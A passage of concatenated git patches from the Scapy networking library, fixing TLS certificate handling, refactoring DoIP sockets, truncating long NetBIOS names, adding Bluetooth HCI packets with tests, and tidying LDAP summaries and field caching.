hmuIJTKLFSaa4HSAzimWpWNKuJhztsZzXUnWSZ8VuHkgHEaSbKqzUlb2g+o/848CvzJrcbeyEBk\nDCYJI5C3nLlQA49LGJ+w4GUPYBwaZ+WFxCX1C8kzglLm') +c = base64.b64decode('MIICHjCCAYcwDQYJKoZIhvcNAQEFBQAwXzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWdu\nLCBJbmMuMTcwNQYDVQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRpb24gQXV0\naG9yaXR5Fw0wNjExMDIwMDAwMDBaFw0wNzAyMTcyMzU5NTlaMIH2MCECECzSS2LEl6QXzW6jyJx6\nLcgXDTA0MDQwMTE3NTYxNVowIQIQOkXeVssCzdzcTndjIhvU1RcNMDEwNTA4MTkyMjM0WjAhAhBB\nXYg2gRUg1YCDRqhZkngsFw0wMTA3MDYxNjU3MjNaMCECEEc5gf/9hIHxlfnrGMJ8DfEXDTAzMDEw\nOTE4MDYxMlowIQIQcFR+auK62HZ/R6mZEEFeZxcNMDIwOTIzMTcwMDA4WjAhAhB+C13eGPI5ZoKm\nj2UiOCPIFw0wMTA1MDgxOTA4MjFaMCICEQDQVEhgGGfTrTXKLw1KJ5VeFw0wMTEyMTExODI2MjFa\nMA0GCSqGSIb3DQEBBQUAA4GBACLJ9rsdoaU9JMf/sCIRs3AGW8VV3TN2oJgiCGNEac9PRyV3mRKE\n0hmuIJTKLFSaa4HSAzimWpWNKuJhztsZzXUnWSZ8VuHkgHEaSbKqzUlb2g+o/848CvzJrcbeyEBk\nDCYJI5C3nLlQA49LGJ+w4GUPYBwaZ+WFxCX1C8kzglLm') x=X509_CRL(c) = CRL class : Rebuild crl From 5c7b694854ca5d6901192dde004a74864f0cf6c3 Mon Sep 17 00:00:00 2001 From: Frank Buss <55055211+Frank-Buss@users.noreply.github.com> Date: Tue, 3 Sep 2024 09:22:23 +0200 Subject: [PATCH 1356/1632] Don't crash on invalid certificates (TLS) (#4494) --- scapy/layers/tls/handshake.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 3f5154ecc15..6a5e3834c76 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -1006,11 +1006,11 @@ def post_dissection_tls_session_update(self, msg_str): connection_end = self.tls_session.connection_end if connection_end == "client": if self.certs: - sc = [x.cert[1] for x in self.certs] + sc = [x.cert[1] for x in self.certs if hasattr(x, 'cert')] self.tls_session.server_certs = sc else: if self.certs: - cc = [x.cert[1] for x in self.certs] + cc = [x.cert[1] for x in self.certs if hasattr(x, 'cert')] self.tls_session.client_certs = cc From 32c79bae2c6357f4bf62a486f16b0909b346b16f Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 3 Sep 2024 20:40:52 +0200 Subject: [PATCH 1357/1632] add intermediat DoIPSocket (#4518) --- scapy/contrib/automotive/doip.py | 83 ++++++++++++++++++-------------- 1 file changed, 46 insertions(+), 37 deletions(-) diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 1bc7b2cfe9b..60b304638ba 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -8,12 +8,22 @@ # scapy.contrib.description = Diagnostic over IP (DoIP) / ISO 13400 # scapy.contrib.status = loads -import struct import socket -import time import ssl +import struct +import time +from typing import ( + Any, + Union, + Tuple, + Optional, + Dict, + Type, +) from scapy.contrib.automotive import log_automotive +from scapy.contrib.automotive.uds import UDS +from scapy.data import MTU from scapy.fields import ( ByteEnumField, ConditionalField, @@ -27,19 +37,9 @@ XShortField, XStrField, ) +from scapy.layers.inet import TCP, UDP from scapy.packet import Packet, bind_layers, bind_bottom_up from scapy.supersocket import StreamSocket, SSLStreamSocket -from scapy.layers.inet import TCP, UDP -from scapy.contrib.automotive.uds import UDS -from scapy.data import MTU - -from typing import ( - Any, - Union, - Tuple, - Optional, - Dict, -) # ISO 13400-2 sect 9.2 @@ -280,7 +280,37 @@ def tcp_reassemble(cls, data, metadata, session): bind_layers(DoIP, UDS, payload_type=0x8001) -class DoIPSocket(SSLStreamSocket): +class DoIPSSLStreamSocket(SSLStreamSocket): + """Custom SSLStreamSocket for DoIP communication. + """ + + def __init__(self, sock, basecls=None): + # type: (socket.socket, Optional[Type[Packet]]) -> None + super(DoIPSSLStreamSocket, self).__init__(sock, basecls or DoIP) + self.buffer = b"" + + def recv(self, x=MTU, **kwargs): + # type: (Optional[int], **Any) -> Optional[Packet] + if len(self.buffer) < 8: + self.buffer += self.ins.recv(8) + if len(self.buffer) < 8: + return None + len_data = self.buffer[:8] + + len_int = struct.unpack(">I", len_data[4:8])[0] + len_int += 8 + + self.buffer += self.ins.recv(len_int - len(self.buffer)) + if len(self.buffer) < len_int: + return None + pktbuf = self.buffer[:len_int] + self.buffer = self.buffer[len_int:] + + pkt = self.basecls(pktbuf, **kwargs) # type: Packet + return pkt + + +class DoIPSocket(DoIPSSLStreamSocket): """Socket for DoIP communication. This sockets automatically sends a routing activation request as soon as a TCP or TLS connection is established. @@ -328,7 +358,6 @@ def __init__(self, self.target_address = target_address self.activation_type = activation_type self.reserved_oem = reserved_oem - self.buffer = b"" self.force_tls = force_tls self.context = context try: @@ -337,26 +366,6 @@ def __init__(self, self.close() raise - def recv(self, x=MTU, **kwargs): - # type: (Optional[int], **Any) -> Optional[Packet] - if len(self.buffer) < 8: - self.buffer += self.ins.recv(8) - if len(self.buffer) < 8: - return None - len_data = self.buffer[:8] - - len_int = struct.unpack(">I", len_data[4:8])[0] - len_int += 8 - - self.buffer += self.ins.recv(len_int - len(self.buffer)) - if len(self.buffer) < len_int: - return None - pktbuf = self.buffer[:len_int] - self.buffer = self.buffer[len_int:] - - pkt = self.basecls(pktbuf, **kwargs) # type: Packet - return pkt - def _init_socket(self, sock_family=socket.AF_INET): # type: (int) -> None connected = False @@ -369,7 +378,7 @@ def _init_socket(self, sock_family=socket.AF_INET): addrinfo = socket.getaddrinfo(self.ip, self.port, proto=socket.IPPROTO_TCP) s.connect(addrinfo[0][-1]) connected = True - SSLStreamSocket.__init__(self, s, DoIP) + DoIPSSLStreamSocket.__init__(self, s) if not self.activate_routing: return @@ -398,7 +407,7 @@ def _init_socket(self, sock_family=socket.AF_INET): addrinfo = socket.getaddrinfo( self.ip, self.tls_port, proto=socket.IPPROTO_TCP) ss.connect(addrinfo[0][-1]) - SSLStreamSocket.__init__(self, ss, DoIP) + DoIPSSLStreamSocket.__init__(self, ss) if not self.activate_routing: return From 45ea41a327d7a696e53ea0a2afa73072e2ea03b6 Mon Sep 17 00:00:00 2001 From: "C.J. May" Date: Thu, 5 Sep 2024 11:45:20 -0500 Subject: [PATCH 1358/1632] Match Netbios responses for hostnames over length 15 (#4446) * avoid long names not matching response packet * unit test for long netbios hostname * trim original request hostname not response packet hostname * truncate name in h2i method instead * Work if None is passed --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/fields.py | 6 ++++++ test/scapy/layers/netbios.uts | 13 +++++++++++++ 2 files changed, 19 insertions(+) diff --git a/scapy/fields.py b/scapy/fields.py index d081a095f16..06d73225589 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1930,6 +1930,12 @@ def __init__(self, name, default, length=31): # type: (str, bytes, int) -> None StrFixedLenField.__init__(self, name, default, length) + def h2i(self, pkt, x): + # type: (Optional[Packet], bytes) -> bytes + if x and len(x) > 15: + x = x[:15] + return x + def i2m(self, pkt, y): # type: (Optional[Packet], Optional[bytes]) -> bytes if pkt: diff --git a/test/scapy/layers/netbios.uts b/test/scapy/layers/netbios.uts index f99ddbfd649..b5d6e8d4f46 100644 --- a/test/scapy/layers/netbios.uts +++ b/test/scapy/layers/netbios.uts @@ -45,6 +45,19 @@ assert z.ADDR_ENTRY[0].NB_ADDRESS == "192.168.1.65" req = IP(ihl=5, len=78, proto=17, chksum=8562, src='172.19.0.7', dst='172.19.0.255')/UDP(sport=137, dport=137, len=58, chksum=62101)/NBNSHeader(NM_FLAGS=17, QDCOUNT=1)/NBNSQueryRequest(QUESTION_NAME=b'Loremipsumdolor', SUFFIX=17217) resp = IP(b'E\x00\x00Zn\xab@\x00@\x11s\xb5\xac\x13\x00\x05\xac\x13\x00\x07\x00\x89\x00\x89\x00FX\x8a\x00\x00\x85\x00\x00\x00\x00\x01\x00\x00\x00\x00 EMGPHCGFGNGJHAHDHFGNGEGPGMGPHCCA\x00\x00 \x00\x01\x00\x00\x00\xa5\x00\x06\x00\x00\xac\x13\x00\x05') +try: + conf.checkIPaddr = True + assert not resp.answers(req) + conf.checkIPaddr = False + assert resp.answers(req) +finally: + conf.checkIPaddr = True + += NBNSQueryResponse answers long NBNSQueryRequest + +req = IP(ihl=5, len=78, proto=17, chksum=8562, src='172.19.0.7', dst='172.19.0.255')/UDP(sport=137, dport=137, len=58, chksum=62101)/NBNSHeader(NM_FLAGS=17, QDCOUNT=1)/NBNSQueryRequest(QUESTION_NAME=b'Loremipsumdolorsitamet', SUFFIX=17217) +resp = IP(b'E\x00\x00Zn\xab@\x00@\x11s\xb5\xac\x13\x00\x05\xac\x13\x00\x07\x00\x89\x00\x89\x00FX\x8a\x00\x00\x85\x00\x00\x00\x00\x01\x00\x00\x00\x00 EMGPHCGFGNGJHAHDHFGNGEGPGMGPHCCA\x00\x00 \x00\x01\x00\x00\x00\xa5\x00\x06\x00\x00\xac\x13\x00\x05') + try: conf.checkIPaddr = True assert not resp.answers(req) From a51bcd5bbf64f16c27693dfed76103a8d781b79f Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Thu, 5 Sep 2024 22:04:36 +0200 Subject: [PATCH 1359/1632] bluetooth: Add more hci packets (#4514) --- scapy/layers/bluetooth.py | 175 ++++++++++++++++---------------- test/scapy/layers/bluetooth.uts | 36 +++++++ 2 files changed, 121 insertions(+), 90 deletions(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 0243e6fe8c6..c86906aa370 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -1277,7 +1277,7 @@ def post_build(self, p, pay): # BUETOOTH CORE SPECIFICATION 5.4 | Vol 3, Part C -# 8 EXTENDED INQUIRY RESPONSE +# 8 EXTENDED INQUIRY RESPONSE class HCI_Extended_Inquiry_Response(Packet): fields_desc = [ @@ -1297,14 +1297,10 @@ class HCI_Extended_Inquiry_Response(Packet): # 7 HCI COMMANDS AND EVENTS # 7.1 LINK CONTROL COMMANDS, the OGF is defined as 0x01 - class HCI_Cmd_Inquiry(Packet): """ - 7.1.1 Inquiry command - """ - name = "HCI_Inquiry" fields_desc = [XLE3BytesField("lap", 0x9E8B33), ByteField("inquiry_length", 0), @@ -1313,21 +1309,15 @@ class HCI_Cmd_Inquiry(Packet): class HCI_Cmd_Inquiry_Cancel(Packet): """ - 7.1.2 Inquiry Cancel command - """ - name = "HCI_Inquiry_Cancel" class HCI_Cmd_Periodic_Inquiry_Mode(Packet): """ - 7.1.3 Periodic Inquiry Mode command - """ - name = "HCI_Periodic_Inquiry_Mode" fields_desc = [LEShortField("max_period_length", 0x0003), LEShortField("min_period_length", 0x0002), @@ -1338,21 +1328,15 @@ class HCI_Cmd_Periodic_Inquiry_Mode(Packet): class HCI_Cmd_Exit_Peiodic_Inquiry_Mode(Packet): """ - 7.1.4 Exit Periodic Inquiry Mode command - """ - name = "HCI_Exit_Periodic_Inquiry_Mode" class HCI_Cmd_Create_Connection(Packet): """ - 7.1.5 Create Connection command - """ - name = "HCI_Create_Connection" fields_desc = [LEMACField("bd_addr", None), LEShortField("packet_type", 0xcc18), @@ -1364,11 +1348,8 @@ class HCI_Cmd_Create_Connection(Packet): class HCI_Cmd_Disconnect(Packet): """ - 7.1.6 Disconnect command - """ - name = "HCI_Disconnect" fields_desc = [XLEShortField("handle", 0), ByteField("reason", 0x13), ] @@ -1376,22 +1357,16 @@ class HCI_Cmd_Disconnect(Packet): class HCI_Cmd_Create_Connection_Cancel(Packet): """ - 7.1.7 Create Connection Cancel command - """ - name = "HCI_Create_Connection_Cancel" fields_desc = [LEMACField("bd_addr", None), ] class HCI_Cmd_Accept_Connection_Request(Packet): """ - 7.1.8 Accept Connection Request command - """ - name = "HCI_Accept_Connection_Request" fields_desc = [LEMACField("bd_addr", None), ByteField("role", 0x1), ] @@ -1399,9 +1374,7 @@ class HCI_Cmd_Accept_Connection_Request(Packet): class HCI_Cmd_Reject_Connection_Response(Packet): """ - 7.1.9 Reject Connection Request command - """ name = "HCI_Reject_Connection_Response" fields_desc = [LEMACField("bd_addr", None), @@ -1410,11 +1383,8 @@ class HCI_Cmd_Reject_Connection_Response(Packet): class HCI_Cmd_Link_Key_Request_Reply(Packet): """ - 7.1.10 Link Key Request Reply command - """ - name = "HCI_Link_Key_Request_Reply" fields_desc = [LEMACField("bd_addr", None), NBytesField("link_key", None, 16), ] @@ -1422,22 +1392,16 @@ class HCI_Cmd_Link_Key_Request_Reply(Packet): class HCI_Cmd_Link_Key_Request_Negative_Reply(Packet): """ - 7.1.11 Link Key Request Negative Reply command - """ - name = "HCI_Link_Key_Request_Negative_Reply" fields_desc = [LEMACField("bd_addr", None), ] class HCI_Cmd_PIN_Code_Request_Reply(Packet): """ - 7.1.12 PIN Code Request Reply command - """ - name = "HCI_PIN_Code_Request_Reply" fields_desc = [LEMACField("bd_addr", None), ByteField("pin_code_length", 7), @@ -1446,22 +1410,16 @@ class HCI_Cmd_PIN_Code_Request_Reply(Packet): class HCI_Cmd_PIN_Code_Request_Negative_Reply(Packet): """ - 7.1.13 PIN Code Request Negative Reply command - """ - name = "HCI_PIN_Code_Request_Negative_Reply" fields_desc = [LEMACField("bd_addr", None), ] class HCI_Cmd_Change_Connection_Packet_Type(Packet): """ - 7.1.14 Change Connection Packet Type command - """ - name = "HCI_Cmd_Change_Connection_Packet_Type" fields_desc = [XLEShortField("connection_handle", None), LEShortField("packet_type", 0), ] @@ -1469,44 +1427,32 @@ class HCI_Cmd_Change_Connection_Packet_Type(Packet): class HCI_Cmd_Authentication_Requested(Packet): """ - 7.1.15 Authentication Requested command - """ - name = "HCI_Authentication_Requested" fields_desc = [LEShortField("handle", 0)] class HCI_Cmd_Set_Connection_Encryption(Packet): """ - 7.1.16 Set Connection Encryption command - """ - name = "HCI_Set_Connection_Encryption" fields_desc = [LEShortField("handle", 0), ByteField("encryption_enable", 0)] class HCI_Cmd_Change_Connection_Link_Key(Packet): """ - 7.1.17 Change Connection Link Key command - """ - name = "HCI_Change_Connection_Link_Key" fields_desc = [LEShortField("handle", 0), ] class HCI_Cmd_Link_Key_Selection(Packet): """ - 7.1.18 Change Connection Link Key command - """ - name = "HCI_Cmd_Link_Key_Selection" fields_desc = [ByteEnumField("handle", 0, {0: "Use semi-permanent Link Keys", 1: "Use Temporary Link Key", }), ] @@ -1514,11 +1460,8 @@ class HCI_Cmd_Link_Key_Selection(Packet): class HCI_Cmd_Remote_Name_Request(Packet): """ - 7.1.19 Remote Name Request command - """ - name = "HCI_Remote_Name_Request" fields_desc = [LEMACField("bd_addr", None), ByteField("page_scan_repetition_mode", 0x02), @@ -1528,33 +1471,24 @@ class HCI_Cmd_Remote_Name_Request(Packet): class HCI_Cmd_Remote_Name_Request_Cancel(Packet): """ - 7.1.20 Remote Name Request Cancel command - """ - name = "HCI_Remote_Name_Request_Cancel" fields_desc = [LEMACField("bd_addr", None), ] class HCI_Cmd_Read_Remote_Supported_Features(Packet): """ - 7.1.21 Read Remote Supported Features command - """ - name = "HCI_Read_Remote_Supported_Features" fields_desc = [LEShortField("connection_handle", None), ] class HCI_Cmd_Read_Remote_Extended_Features(Packet): """ - 7.1.22 Read Remote Extended Features command - """ - name = "HCI_Read_Remote_Supported_Features" fields_desc = [LEShortField("connection_handle", None), ByteField("page_number", None), ] @@ -1562,11 +1496,8 @@ class HCI_Cmd_Read_Remote_Extended_Features(Packet): class HCI_Cmd_IO_Capability_Request_Reply(Packet): """ - 7.1.29 IO Capability Request Reply command - """ - name = "HCI_Read_Remote_Supported_Features" fields_desc = [LEMACField("bd_addr", None), ByteEnumField("io_capability", None, {0x00: "DisplayOnly", @@ -1588,33 +1519,24 @@ class HCI_Cmd_IO_Capability_Request_Reply(Packet): class HCI_Cmd_User_Confirmation_Request_Reply(Packet): """ - 7.1.30 User Confirmation Request Reply command - """ - name = "HCI_User_Confirmation_Request_Reply" fields_desc = [LEMACField("bd_addr", None), ] class HCI_Cmd_User_Confirmation_Request_Negative_Reply(Packet): """ - 7.1.31 User Confirmation Request Negative Reply command - """ - name = "HCI_User_Confirmation_Request_Negative_Reply" fields_desc = [LEMACField("bd_addr", None), ] class HCI_Cmd_User_Passkey_Request_Reply(Packet): """ - 7.1.32 User Passkey Request Reply command - """ - name = "HCI_User_Passkey_Request_Reply" fields_desc = [LEMACField("bd_addr", None), LEIntField("numeric_value", None), ] @@ -1622,22 +1544,16 @@ class HCI_Cmd_User_Passkey_Request_Reply(Packet): class HCI_Cmd_User_Passkey_Request_Negative_Reply(Packet): """ - 7.1.33 User Passkey Request Negative Reply command - """ - name = "HCI_User_Passkey_Request_Negative_Reply" fields_desc = [LEMACField("bd_addr", None), ] class HCI_Cmd_Remote_OOB_Data_Request_Reply(Packet): """ - 7.1.34 Remote OOB Data Request Reply command - """ - name = "HCI_Remote_OOB_Data_Request_Reply" fields_desc = [LEMACField("bd_addr", None), NBytesField("C", b"\x00" * 16, sz=16), @@ -1646,16 +1562,13 @@ class HCI_Cmd_Remote_OOB_Data_Request_Reply(Packet): class HCI_Cmd_Remote_OOB_Data_Request_Negative_Reply(Packet): """ - 7.1.35 Remote OOB Data Request Negative Reply command - """ - name = "HCI_Remote_OOB_Data_Request_Negative_Reply" fields_desc = [LEMACField("bd_addr", None), ] -# 7.2 Link Policy commands, the OGF is defined as 0x02 +# 7.2 Link Policy commands, the OGF is defined as 0x02 class HCI_Cmd_Hold_Mode(Packet): name = "HCI_Hold_Mode" @@ -1667,24 +1580,43 @@ class HCI_Cmd_Hold_Mode(Packet): # 7.3 CONTROLLER & BASEBAND COMMANDS, the OGF is defined as 0x03 class HCI_Cmd_Set_Event_Mask(Packet): + """ + 7.3.1 Set Event Mask command + """ name = "HCI_Set_Event_Mask" fields_desc = [StrFixedLenField("mask", b"\xff\xff\xfb\xff\x07\xf8\xbf\x3d", 8)] # noqa: E501 class HCI_Cmd_Reset(Packet): + """ + 7.3.2 Reset command + """ name = "HCI_Reset" class HCI_Cmd_Set_Event_Filter(Packet): + """ + 7.3.3 Set Event Filter command + """ name = "HCI_Set_Event_Filter" fields_desc = [ByteEnumField("type", 0, {0: "clear"}), ] class HCI_Cmd_Write_Local_Name(Packet): + """ + 7.3.11 Write Local Name command + """ name = "HCI_Write_Local_Name" fields_desc = [StrFixedLenField('name', '', length=248)] +class HCI_Cmd_Read_Local_Name(Packet): + """ + 7.3.12 Read Local Name command + """ + name = "HCI_Read_Local_Name" + + class HCI_Cmd_Write_Connect_Accept_Timeout(Packet): name = "HCI_Write_Connection_Accept_Timeout" fields_desc = [LEShortField("timeout", 32000)] # 32000 slots is 20000 msec @@ -1707,11 +1639,30 @@ class HCI_Cmd_Write_LE_Host_Support(Packet): # 7.4 INFORMATIONAL PARAMETERS, the OGF is defined as 0x04 + +class HCI_Cmd_Read_Local_Version_Information(Packet): + """ + 7.4.1 Read Local Version Information command + """ + name = "HCI_Read_Local_Version_Information" + + +class HCI_Cmd_Read_Local_Extended_Features(Packet): + """ + 7.4.4 Read Local Extended Features command + """ + name = "HCI_Read_Local_Extended_Features" + fields_desc = [ByteField("page_number", 0)] + + class HCI_Cmd_Read_BD_Addr(Packet): + """ + 7.4.6 Read BD_ADDR command + """ name = "HCI_Read_BD_ADDR" -# 7.5 STATUS PARAMETERS, the OGF is defined as 0x05 +# 7.5 STATUS PARAMETERS, the OGF is defined as 0x05 class HCI_Cmd_Read_Link_Quality(Packet): name = "HCI_Read_Link_Quality" @@ -1724,6 +1675,7 @@ class HCI_Cmd_Read_RSSI(Packet): # 7.6 TESTING COMMANDS, the OGF is defined as 0x06 + class HCI_Cmd_Read_Loopback_Mode(Packet): name = "HCI_Read_Loopback_Mode" @@ -1737,6 +1689,7 @@ class HCI_Cmd_Write_Loopback_Mode(Packet): # 7.8 LE CONTROLLER COMMANDS, the OGF code is defined as 0x08 + class HCI_Cmd_LE_Read_Buffer_Size_V1(Packet): name = "HCI_LE_Read_Buffer_Size [v1]" @@ -2136,7 +2089,43 @@ def answers(self, other): return self.payload.answers(other) +class HCI_Cmd_Complete_Read_Local_Name(Packet): + """ + 7.3.12 Read Local Name command complete + """ + name = 'Read Local Name command complete' + fields_desc = [StrFixedLenField('local_name', '', length=248)] + + +class HCI_Cmd_Complete_Read_Local_Version_Information(Packet): + """ + 7.4.1 Read Local Version Information command complete + """ + name = 'Read Local Version Information' + fields_desc = [ + ByteField('hci_version', 0), + LEShortField('hci_subversion', 0), + ByteField('lmp_version', 0), + LEShortField('company_identifier', 0), + LEShortField('lmp_subversion', 0)] + + +class HCI_Cmd_Complete_Read_Local_Extended_Features(Packet): + """ + 7.4.4 Read Local Extended Features command complete + """ + name = 'Read Local Extended Features command complete' + fields_desc = [ + ByteField('page', 0x00), + ByteField('max_page', 0x00), + XLELongField('extended_features', 0) + ] + + class HCI_Cmd_Complete_Read_BD_Addr(Packet): + """ + 7.4.6 Read BD_ADDR command complete + """ name = "Read BD Addr" fields_desc = [LEMACField("addr", None), ] @@ -2262,12 +2251,15 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(HCI_Command_Hdr, HCI_Cmd_Reset, ogf=0x03, ocf=0x0003) bind_layers(HCI_Command_Hdr, HCI_Cmd_Set_Event_Filter, ogf=0x03, ocf=0x0005) bind_layers(HCI_Command_Hdr, HCI_Cmd_Write_Local_Name, ogf=0x03, ocf=0x0013) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_Local_Name, ogf=0x03, ocf=0x0014) bind_layers(HCI_Command_Hdr, HCI_Cmd_Write_Connect_Accept_Timeout, ogf=0x03, ocf=0x0016) bind_layers(HCI_Command_Hdr, HCI_Cmd_Write_Extended_Inquiry_Response, ogf=0x03, ocf=0x0052) # noqa: E501 bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_LE_Host_Support, ogf=0x03, ocf=0x006c) bind_layers(HCI_Command_Hdr, HCI_Cmd_Write_LE_Host_Support, ogf=0x03, ocf=0x006d) # 7.4 INFORMATIONAL PARAMETERS, the OGF is defined as 0x04 +bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_Local_Version_Information, ogf=0x04, ocf=0x0001) # noqa: E501 +bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_Local_Extended_Features, ogf=0x04, ocf=0x0004) bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_BD_Addr, ogf=0x04, ocf=0x0009) # 7.5 STATUS PARAMETERS, the OGF is defined as 0x05 @@ -2322,6 +2314,9 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(HCI_Event_Hdr, HCI_Event_IO_Capability_Response, code=0x32) bind_layers(HCI_Event_Hdr, HCI_Event_LE_Meta, code=0x3e) +bind_layers(HCI_Event_Command_Complete, HCI_Cmd_Complete_Read_Local_Name, opcode=0x0c14) # noqa: E501 +bind_layers(HCI_Event_Command_Complete, HCI_Cmd_Complete_Read_Local_Version_Information, opcode=0x1001) # noqa: E501 +bind_layers(HCI_Event_Command_Complete, HCI_Cmd_Complete_Read_Local_Extended_Features, opcode=0x1004) # noqa: E501 bind_layers(HCI_Event_Command_Complete, HCI_Cmd_Complete_Read_BD_Addr, opcode=0x1009) # noqa: E501 bind_layers(HCI_Event_Command_Complete, HCI_Cmd_Complete_LE_Read_White_List_Size, opcode=0x200f) # noqa: E501 diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index fbd16a3d4dd..6696efe6846 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -197,6 +197,42 @@ assert cmd[HCI_Cmd_Remote_Name_Request].page_scan_repetition_mode == 2 assert cmd[HCI_Cmd_Remote_Name_Request].reserved == 0 assert cmd[HCI_Cmd_Remote_Name_Request].clock_offset == 0 += 7.3.12 Read Local Name +cmd = HCI_Hdr() / HCI_Command_Hdr() / HCI_Cmd_Read_Local_Name() +assert raw(cmd) == hex_bytes("01140c00") + +# Response +response = HCI_Hdr(hex_bytes("040efc01140c00546865726d6973746f7200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")) +assert HCI_Cmd_Complete_Read_Local_Name in response +assert response[HCI_Cmd_Complete_Read_Local_Name].local_name.decode('utf-8').rstrip('\x00') == 'Thermistor' +assert response.answers(cmd) + += 7.4.1 Read Local Version Information +cmd = HCI_Hdr() / HCI_Command_Hdr() / HCI_Cmd_Read_Local_Version_Information() +assert raw(cmd) == hex_bytes("01011000") + +# Response +response = HCI_Hdr(hex_bytes("040e0c010110000900100931010c22")) +assert HCI_Cmd_Complete_Read_Local_Version_Information in response +assert response[HCI_Cmd_Complete_Read_Local_Version_Information].hci_version == 9 +assert response[HCI_Cmd_Complete_Read_Local_Version_Information].hci_subversion == 4096 +assert response[HCI_Cmd_Complete_Read_Local_Version_Information].lmp_version == 9 +assert response[HCI_Cmd_Complete_Read_Local_Version_Information].company_identifier == 0x0131 +assert response[HCI_Cmd_Complete_Read_Local_Version_Information].lmp_subversion == 8716 +assert response.answers(cmd) + += 7.4.4 Read Local Extended Features +cmd = HCI_Hdr() / HCI_Command_Hdr() / HCI_Cmd_Read_Local_Extended_Features(page_number=1) +assert raw(cmd) == hex_bytes("0104100101") + +# Response +response = HCI_Hdr(hex_bytes("040e0e0104100001020000000000000000")) +assert HCI_Cmd_Complete_Read_Local_Extended_Features in response +assert response[HCI_Cmd_Complete_Read_Local_Extended_Features].page == 1 +assert response[HCI_Cmd_Complete_Read_Local_Extended_Features].max_page == 2 +assert response[HCI_Cmd_Complete_Read_Local_Extended_Features].extended_features == 0 +assert response.answers(cmd) + = LE Create Connection # Request data From 1935723c18b45b0a735d9e44ca80a0d4976a5bb9 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Thu, 5 Sep 2024 23:15:25 +0200 Subject: [PATCH 1360/1632] Check LDAP fields (#4524) --- scapy/layers/ldap.py | 2 ++ test/regression.uts | 5 +++++ 2 files changed, 7 insertions(+) diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 494809a6ab7..26db10ce838 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -729,6 +729,8 @@ def answers(self, other): return isinstance(other, LDAP) and other.messageID == self.messageID def mysummary(self): + if not self.protocolOp or not self.messageID: + return "" return ( "%s(%s)" % ( diff --git a/test/regression.uts b/test/regression.uts index e182f92b96e..09296a0b141 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2338,6 +2338,11 @@ except Scapy_Exception: file = BytesIO(b"\n\r\r\n\x00\x00\x008\x1a+ Date: Sat, 7 Sep 2024 15:49:38 +0200 Subject: [PATCH 1361/1632] Small optimization of cache during parsing (#4526) --- scapy/packet.py | 19 +++++++++++-------- 1 file changed, 11 insertions(+), 8 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 0e096b2c690..0e7edee4938 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -167,7 +167,7 @@ def __init__(self, self.fieldtype = {} # type: Dict[str, AnyField] self.packetfields = [] # type: List[AnyField] self.payload = NoPayload() # type: Packet - self.init_fields() + self.init_fields(bool(_pkt)) self.underlayer = _underlayer self.parent = _parent if isinstance(_pkt, bytearray): @@ -253,8 +253,8 @@ def __deepcopy__(self, """Used by copy.deepcopy""" return self.copy() - def init_fields(self): - # type: () -> None + def init_fields(self, for_dissect_only=False): + # type: (bool) -> None """ Initialize each fields of the fields_desc dict """ @@ -262,7 +262,7 @@ def init_fields(self): if self.class_dont_cache.get(self.__class__, False): self.do_init_fields(self.fields_desc) else: - self.do_init_cached_fields() + self.do_init_cached_fields(for_dissect_only=for_dissect_only) def do_init_fields(self, flist, # type: Sequence[AnyField] @@ -280,8 +280,8 @@ def do_init_fields(self, # We set default_fields last to avoid race issues self.default_fields = default_fields - def do_init_cached_fields(self): - # type: () -> None + def do_init_cached_fields(self, for_dissect_only=False): + # type: (bool) -> None """ Initialize each fields of the fields_desc dict, or use the cached fields information @@ -300,6 +300,10 @@ def do_init_cached_fields(self): self.fieldtype = Packet.class_fieldtype[cls_name] self.packetfields = Packet.class_packetfields[cls_name] + # Optimization: no need for references when only dissecting. + if for_dissect_only: + return + # Deepcopy default references for fname in Packet.class_default_fields_ref[cls_name]: value = self.default_fields[fname] @@ -334,8 +338,7 @@ def prepare_cached_fields(self, flist): self.do_init_fields(self.fields_desc) return - tmp_copy = copy.deepcopy(f.default) - class_default_fields[f.name] = tmp_copy + class_default_fields[f.name] = copy.deepcopy(f.default) class_fieldtype[f.name] = f if f.holds_packets: class_packetfields.append(f) From 867f92a37d06029dffc6fc356fe96ada394c9c06 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 7 Sep 2024 15:50:14 +0200 Subject: [PATCH 1362/1632] Remove unnecessary check (#4528) --- scapy/arch/linux/__init__.py | 2 -- 1 file changed, 